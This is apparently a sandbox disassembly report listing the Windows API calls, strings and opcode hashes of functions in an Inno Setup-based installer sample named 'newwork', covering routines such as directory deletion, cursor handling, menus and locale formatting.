                                                                                        • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                        • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                        • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                          • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                        Strings
                                                                                        • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                        • Deleting directory: %s, xrefs: 00459E5B
                                                                                        • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                        • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                        • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                        • Stripped read-only attribute., xrefs: 00459E94
                                                                                        • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseErrorFindLast
                                                                                        • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                        • API String ID: 754982922-1448842058
                                                                                        • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                        • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                        • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                        • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                        APIs
                                                                                        • GetCapture.USER32 ref: 00422EA4
                                                                                        • GetCapture.USER32 ref: 00422EB3
                                                                                        • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                        • ReleaseCapture.USER32 ref: 00422EBE
                                                                                        • GetActiveWindow.USER32 ref: 00422ECD
                                                                                        • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                        • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                        • GetActiveWindow.USER32 ref: 00422FBF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                        • String ID:
                                                                                        • API String ID: 862346643-0
                                                                                        • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                        • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                        • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                        • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                        APIs
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                        • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                        • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveLong$Message
                                                                                        • String ID:
                                                                                        • API String ID: 2785966331-0
                                                                                        • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                        • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                        • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                        • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0042948A
                                                                                        • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                        • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                        • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                        • String ID:
                                                                                        • API String ID: 1583807278-0
                                                                                        • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                        • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                        • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                        • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0041DE27
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                        • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                        • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                        • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                        • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                        • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                        • String ID:
                                                                                        • API String ID: 225703358-0
                                                                                        • Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                        • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                        • Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                        • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                        APIs
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                        • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load
                                                                                        • String ID: $ $Internal error: Item already expanding
                                                                                        • API String ID: 1675784387-1948079669
                                                                                        • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                        • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                        • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                        • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                        APIs
                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringWrite
                                                                                        • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                        • API String ID: 390214022-3304407042
                                                                                        • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                        • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                        • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                        • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                        APIs
                                                                                        • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                        • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                        • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassInfoLongMessageSendWindow
                                                                                        • String ID: COMBOBOX$Inno Setup: Language
                                                                                        • API String ID: 3391662889-4234151509
                                                                                        • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                        • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                        • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                        • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                        APIs
                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                          • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                          • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale$DefaultSystem
                                                                                        • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                        • API String ID: 1044490935-665933166
                                                                                        • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                        • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                        • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                        • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                        • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                          • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                        • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                          • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                        • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                        • String ID: ,$?
                                                                                        • API String ID: 2359071979-2308483597
                                                                                        • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                        • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                        • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                        • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                        APIs
                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                        • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                        • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                        • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                        • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                        • String ID:
                                                                                        • API String ID: 1030595962-0
                                                                                        • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                        • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                        • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                        • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                        APIs
                                                                                        • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                        • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                        • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                        • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                        • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                        • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                        • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                        • String ID:
                                                                                        • API String ID: 2222416421-0
                                                                                        • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                        • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                        • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                        • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                          • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                          • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                          • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                        • TranslateMessage.USER32(?), ref: 004573B3
                                                                                        • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                        • String ID: [Paused]
                                                                                        • API String ID: 1007367021-4230553315
                                                                                        • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                        • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                        • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                        • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                        APIs
                                                                                        • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                        • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                        • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$LoadSleep
                                                                                        • String ID: CheckPassword
                                                                                        • API String ID: 4023313301-1302249611
                                                                                        • Opcode ID: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                        • Instruction ID: 9465d4cba05e43c3341d6d018928b45656d3fee3f016636846a90655da25d4f4
                                                                                        • Opcode Fuzzy Hash: 301d54e166a0b4011b0937e4b70ed1e1b4ade500f65d2603abaf2adc357acc1d
                                                                                        • Instruction Fuzzy Hash: D0316334740204AFD711EF69C899B9A7BE4EF45308F5580B6F9049B3A2D7789E40CB99
                                                                                        APIs
                                                                                          • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                          • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                          • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                        • SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
                                                                                        • GetTickCount.KERNEL32 ref: 00477CE6
                                                                                        • GetTickCount.KERNEL32 ref: 00477CF0
                                                                                        • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
                                                                                        Strings
